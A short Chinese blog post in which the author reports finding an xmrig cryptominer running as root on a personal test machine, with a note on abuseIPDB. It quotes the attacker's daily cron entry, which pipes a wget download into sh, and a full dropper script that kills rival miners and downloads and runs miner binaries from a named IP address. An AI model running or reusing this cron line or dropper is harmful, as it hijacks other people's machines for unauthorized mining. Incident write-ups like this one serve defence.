xmrig的运行程序


矿机自己平时用来做测试的一台机器,所以也没做什么防护,今天上去无意见看到有一个xmrig进程cpu 99%,

Xmrig是啥?

原来是矿机,还用的root干的,我花的银子买的机器,https://blog.csdn.net/kevin_mails/article/details/91462426

abuseIPDB

定时任务运行程序

@daily wget -O - -q http://***.***.**/***   | sh > /dev/null 2>&1

#!/bin/sh
killall xmrrig
rm -rf /tmp/xmrig
netstat -alpn |grep "185.10.68.115\b" | awk '{sub(/\/.*/, "", $NF); print $NF}' | xargs -i kill -9 {}

bit = `uname -m`
if [ -f /tmp/xmrig ]
 then
 /tmp/xmrig &
echo started existing
else
  if ["$bit" = "x86_64" ]; then
   wget -q http://185.10.68.115/m64 - O /tmp/xmrig
  else
   wget -q http://185.10.68.115/m32 - O /tmp/xmrig
  fi;

echo DLd and sttarted $bit
    chmod +x /tmp/xmrig
    /tmp/xmrig &
fi
阅读量: 608
发布于:
修改于: